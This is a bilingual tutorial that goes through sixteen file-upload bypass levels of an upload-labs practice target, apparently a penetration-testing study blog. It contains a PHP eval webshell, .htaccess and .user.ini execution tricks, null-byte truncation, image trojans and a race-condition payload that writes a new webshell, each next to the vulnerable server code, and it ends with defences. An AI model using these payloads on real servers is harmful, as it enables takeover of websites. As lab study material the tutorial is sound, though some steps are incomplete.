Web Security: File Upload Vulnerability Test.
Most websites and web application systems now have upload functions (such as: document, picture, avatar, video upload, etc.), and when programmers develop file upload functions, they do not strictly check the suffix and file name of uploaded files. Type, then the attacker can upload a malicious code dynamic script corresponding to the scripting language of the website, such as (php, jsp, aspx, asp file suffix) to the server, and pass the malicious file to the scripting language of the website to execute, Then you can execute malicious code on the server, perform malicious operations such as database execution, server file management, and server command execution.
Table of contents:
Web Security: File Upload Vulnerability Test.
File upload vulnerability hazards:
File upload vulnerability combat test:
(1) The front end checks illegal pictures!
(2) The backend checks the file type of the data!
(3) The backend checks the extension (suffix) of the data! (Use double writing to bypass)
(4) The backend checks most of the data extensions (suffixes)! (bypass using .htaccess files)
(5) There is a php file in the backend upload directory (bypass by using the .user.ini file)
(6) Use capitalization to bypass.
(7) Add a space after php to bypass.
(8) Use php to add a dot. Bypass.
(9) Use the end file stream to bypass the .
(10) Add (.space.) to the php suffix to bypass.
(11) Change the php suffix to pphphp to bypass.
(12) Use %00 truncation in the file storage path to bypass. (GET %00 truncation)
(13) Use %00 truncation in the file storage path to bypass. (POST %00 truncation)
(14) Use picture horses to bypass. (There are file inclusion vulnerabilities.)
(15) Use continuous uploads to generate new files to bypass.
(16) Bypass involving arrays and file types.
Defense against file upload vulnerabilities:
File upload vulnerability hazards:
(1)上传漏洞与SQL注入或 XSS相比,其风险更大,如果 Web应用程序存在上传漏洞,攻击者上传的
文件是Web脚本语言,服务器的Web容器解释并执行了用户上传的脚本,导致代码执行.
(2)但是攻击者要是上传的文件是病毒、木马文件,就可以诱骗用户或者管理员下载执行。如果上传
的文件是钓鱼图片或为包含了脚本的图片,在某些版本的浏览器中会被作为脚本执行,被用于钓鱼和欺
诈。甚至攻击者可以直接上传一个webshell到服务器上 完全控制系统或致使系统瘫痪.Write a one-sentence program:
<?php phpinfo();?> //测试<?php //一句话木马程序
@eval($_POST['bgxg']);
?>File upload vulnerability combat test:
(1) The front end checks illegal pictures!
我们把 一句话程序(木马) 的后缀改为一个合法的( jpg文件 ),在上传时候的打开 Burp 进行抓包.
使用连接工具进行:连接(菜刀)
程序代码:
function checkFile() {
var file = document.getElementsByName('upload_file')[0].value;
if (file == null || file == "") {
alert("请选择要上传的文件!");
return false;
}
//定义允许上传的文件类型
var allow_ext = ".jpg|.png|.gif";
//提取上传文件的类型
var ext_name = file.substring(file.lastIndexOf("."));
//判断上传文件类型是否允许上传
if (allow_ext.indexOf(ext_name + "|") == -1) {
var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name;
alert(errMsg);
return false;
}
}
(2) The backend checks the file type of the data!
在上传时候的打开 Burp 进行抓包.
通过burp抓包,修改文件类型为 image/gif、image/jpeg、image/png,image/jpeg
程序代码:
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name']
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '文件类型不正确,请重新上传!';
}
} else {
$msg = UPLOAD_PATH.'文件夹不存在,请手工创建!';
}
}(3) The backend checks the extension (suffix) of the data! (Use double writing to bypass)
在上传时候的打开 Burp 进行抓包.
在文件的后缀加 ::$D::$DATAATA // 双写绕过.
程序代码:
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array('.asp','.aspx','.php','.jsp');
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //收尾去空
if(!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file,$img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}(4) The backend checks most of the data extensions (suffixes)! (bypass using .htaccess files)
在源码中对扩展名进行了黑名单限制,所限制的文件类型不全,可上传.htaccess 文件可利用该文件解析
规则增加新的可执行的扩展名.bgxg 绕过,文件内容如下:
AddType application/x-httpd-php .bgxg
然后把这个文件上传 .htaccess
上传后,我们再上传我们的 .bgxg 后缀文件就行.
程序代码:
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".ini");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //收尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件不允许上传!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}(5) There is a php file in the backend upload directory (bypass by using the .user.ini file )
.user.ini 文件中的内容:
auto_append_file=文件名字.png在 图片中添加 的内容:
<?php
@eval($_POST['bgxg']);
?>
上传 .user.ini 文件,然后再把 txt文件 上传.
然后再进行访问这个图片(看看有没有被执行里面的代码),再使用工具连接.程序代码:
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //首尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件类型不允许上传!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}(6) Use capitalization to bypass.
上传 PHp后缀 的文件.
程序代码:
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //首尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件类型不允许上传!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}(7) Add a space after php to bypass.
在上传时候的打开 Burp 进行抓包.
程序代码:
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
$file_name = $_FILES['upload_file']['name'];
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file,$img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件不允许上传';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}(8) Use php to add a dot. Bypass.
在上传时候的打开 Burp 进行抓包.
程序代码:
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
$file_name = trim($_FILES['upload_file']['name']);
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //首尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件类型不允许上传!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}(9) Use the end file stream to bypass the .
在上传时候的打开 Burp 进行抓包.
在 php 后缀后面添加 ::$DATA
程序代码:
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = trim($file_ext); //首尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件类型不允许上传!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}(10) Add (.space.) to the php suffix to bypass.
在上传时候的打开 Burp 进行抓包.
把 .php 后缀后面添加. .
程序代码:
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //首尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件类型不允许上传!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}(11) Change the php suffix to pphphp to bypass.
在上传时候的打开 Burp 进行抓包.
把 .php 后缀改为中 .pphphp 进行绕过.
程序代码:
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess","ini");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = str_ireplace($deny_ext,"", $file_name);
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}(12) Use %00 truncation in the file storage path to bypass. (GET %00 truncation )
采用 %00 截断,需要的php版本<5.3.4,还要将【magic_quotes_gpc】参数关闭
在上传时候的打开 Burp 进行抓包.
在文件的路径中添加 一个自己想要的文件名.(bgxg.php),在后面再添加 %00
//这个是用来保存我们上传文件的内容.
再把我们上传的文件名改为一个合法的 .jpg 文件
然后再去访问 bgxg.php 文件,利用工具连接就行.程序代码:
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$ext_arr = array('jpg','png','gif');
$file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
if(in_array($file_ext,$ext_arr)){
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else{
$msg = "只允许上传.jpg|.png|.gif类型文件!";
}
}(13) Use %00 truncation in the file storage path to bypass. ( POST %00 truncation)
采用 %00 截断,需要的php版本<5.3.4,还要将【magic_quotes_gpc】参数关闭
在上传时候的打开 Burp 进行抓包.
在文件的路径中添加 一个自己想要的文件名.(bgxg.php),在后面再添加 %00
%00 再改为十六进制的
//这个是用来保存我们上传文件的内容.
再把我们上传的文件名改为一个合法的 .jpg 文件
然后再去访问 bgxg.php 文件,利用工具连接就行.程序代码:
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$ext_arr = array('jpg','png','gif');
$file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
if(in_array($file_ext,$ext_arr)){
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = "上传失败";
}
} else {
$msg = "只允许上传.jpg|.png|.gif类型文件!";
}
}(14) Use picture horses to bypass. (There are file inclusion vulnerabilities.)
原理:上传一个图片木马,然后用文件包含漏洞去解析这个图片,从而让里面的代码执行.制作一个图片木马.(010Editor 工具)
然后进行上传,再找到存在文件包含漏洞的地方,去利用这个漏洞去解析图片中的木马,再使用连接工具
进行连接.
function getReailFileType($filename){
$file = fopen($filename, "rb");
$bin = fread($file, 2); //只读2字节
fclose($file);
$strInfo = @unpack("C2chars", $bin);
$typeCode = intval($strInfo['chars1'].$strInfo['chars2']);
$fileType = '';
switch($typeCode){
case 255216:
$fileType = 'jpg';
break;
case 13780:
$fileType = 'png';
break;
case 7173:
$fileType = 'gif';
break;
default:
$fileType = 'unknown';
}
return $fileType;
}
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$temp_file = $_FILES['upload_file']['tmp_name'];
$file_type = getReailFileType($temp_file);
if($file_type == 'unknown'){
$msg = "文件未知,上传失败!";
}else{
$img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$file_type;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = "上传出错!";
}
}
}(15) Use continuous uploads to generate new files to bypass.
原理:把文件上传之后进行检查,发现是不合法的文件则删除,所以我们可以上传一个文件木马,然后
不停的访问,让他在那个上传路径中生成出一个新的文件.上传访问这个文件,进行生成新的文件(bgxg.php),文件内容:
<?php fputs(fopen('bgxg.php','w'),'<?php @eval($_POST["bgxg"]); ?>'); ?>
在 1.php 上传时候的打开 Burp 进行抓包,然后发给测试器,然后放包.
在 测试器 中 添加 ?_t=$1$
我们随便上传一个文件,查看它的存储目录在哪,然后进行访问我们上传的 1.php 抓包,然后发给
测试器,然后放包.
在 测试器 中 添加 ?_t=$1$
进行测试:
然后我们查看有没有生成的文件成功:(去访问生成的新文件 bgxg.php)
程序代码:
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$ext_arr = array('jpg','png','gif');
$file_name = $_FILES['upload_file']['name'];
$temp_file = $_FILES['upload_file']['tmp_name'];
$file_ext = substr($file_name,strrpos($file_name,".")+1);
$upload_file = UPLOAD_PATH . '/' . $file_name;
if(move_uploaded_file($temp_file, $upload_file)){
if(in_array($file_ext,$ext_arr)){
$img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
rename($upload_file, $img_path);
$is_upload = true;
}else{
$msg = "只允许上传.jpg|.png|.gif类型文件!";
unlink($upload_file);
}
}else{
$msg = '上传出错!';
}
}(16) Bypass involving arrays and file types.
在上传时候的打开 Burp 进行抓包.
(1)通过burp抓包,修改文件类型为image/jpeg
(2)添加下面的操作
Defense against file upload vulnerabilities:
(1)对文件的后缀 进行检测.
(2)在前端布置web防火墙,检测上传的是否有eval($_POST[])这样的标记.
(3)文件上传的目录设置为不可执行(只要web容器无法解析该目录下面的文件,即使攻击者上传了脚本
文件,服务器本身也不会受到影响.)
(4)使用随机数改写文件名和文件路径(文件上传如果要执行代码,则需要用户能够访问到这个文件)
(5)提高开发人员的安全意识,尤其是采用PHP语言开发系统(在程序开发阶段应充分考虑程序的安全性)
(6)应用系统上线后,要增加运维人员的安全意思,积极使用多个安全检测工具对应用系统进行安全扫描,
及时发现潜在漏洞并修复.
Reference learning video: Upload Labs file upload target drone clearance 19. Twenty-first level [penetration testing learning process]_哔哩哔哩_bilibili